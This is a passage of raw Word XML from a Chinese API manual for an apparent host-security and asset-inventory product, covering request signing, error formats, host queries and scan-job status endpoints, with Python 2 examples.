        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        elif method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = json.dumps(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + info + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print to_sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(to_sign).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json", "comId": comid, "timestamp": ts,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + jwt}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method=method, url=url, body=json.dumps(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># get请求示例-&gt;获取linux主机列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def get_linux_host():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/host/linux?page=0&amp;size=50" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 即是get请求后面的url参数键值对</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'page': 0, 'size': 50}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># post请求示例-&gt;执行linux基线扫描任务</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def post_execute_linux_baseline_job():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'specId': '5b83764c7d761b72e19e38b6'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/baseline/job/linux/execute" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13F73E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="通用get请求参数类型及说明"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>通用Get请求参数类型及说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00D5C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DateRange: 表示请求时间范围，yyyy-MM-dd HH:mm:ss - yyyy-MM-dd HH:mm:ss 前后用“ - ”(注意前后续的空格)分割为start和end，end部分可以省略，省略后表示到现在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15D504" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Date：时间，yyyy-MM-dd HH:mm:ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7699A409" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>多值参数表示：通过逗号分割，如</w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>http://www.example.org/group=1,2,3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F36E633" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>请求参数分页：page页码，从0开始；size每页条数；sorts:”+field1,-field2”,正序省略，倒序使用-号前缀，如</w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>http://example.org/hosts?page=0&amp;size=50&amp;sorts=ip,-desc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="782A3952" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="数据api请求结果"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t>数据api请求结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E5F64E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>所有接口通过http status=200来判断接口调用是否成功，如果http status != 200 会有如下输出，errorMessage为错误详情。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>接口异常返回数据格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26B706" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 401,   //      错误码，含义与标准httpresponse的status一致</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B482CDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="资产清点"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>资产清点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEDB8EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="资产通用查询扫描状态"/>
      <w:r>
        <w:t>资产通用查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC6776" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询资产信息的扫描状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7A1460" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C801E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/refreshjob/{jobId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BBF31"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630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3412"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0C856B2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B62686E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="394D358E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="620C4A25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CC4724E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756D48E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C91CE08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0099F123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程信息扫描接口返回的扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0761E2B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51437DA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253858D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4A769" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>id: "some job id",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>status: "Running|Success|Failed"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168764A7"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1333"/>
        <w:gridCol w:w="3172"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="58596D2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32D17BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F4628F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6175EAEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C28448" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C07DB7D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BCAD48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56508DA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B5637AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A2A7AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61667CD6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="447C0800" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="654BCDAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="281E5258" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Varchar(7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E49D469" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描的状态（进行中/成功/失败）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33CFFC87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果请求的任务ID 不存在，则返回404，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D179844" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 404,   //      错误码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "数据不存在", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D393EA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>资产信息的扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382526E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#linux启动项信息扫描更新数据的代码示例(python)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/service/linux/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>#资产信息的扫描状态接口调用</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def refresh_job():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    result = refresh()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    job_id = json.loads(result).get('id')</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/refreshjob/%s" % (host, port, job_id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0451E8B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="主机信息"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:t>主机信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558D5C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0DCFFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该功能API用于查询资产中的主机信息，获取查询的结果并展示；您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F10C8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627B6FC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>主机信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347C67CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7385B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6129D1D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C637288" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>主机信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D8DF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>主机信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB3BC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>主机信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58212A57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B623EC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用主机信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530EEC5F"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7E8EEC6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10EB5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="主机信息查询结果"/>
      <w:r>
        <w:t>主机信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402219A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询主机信息，按每台主机进行展示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773E6DA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101D85E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/host/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED65E40"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640"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="624"/>
        <w:gridCol w:w="6481"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4389562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0EA7764" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF335BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26613142" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79AB8139" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BD401A0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06BAE61F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B1ADF78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60FBDEE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
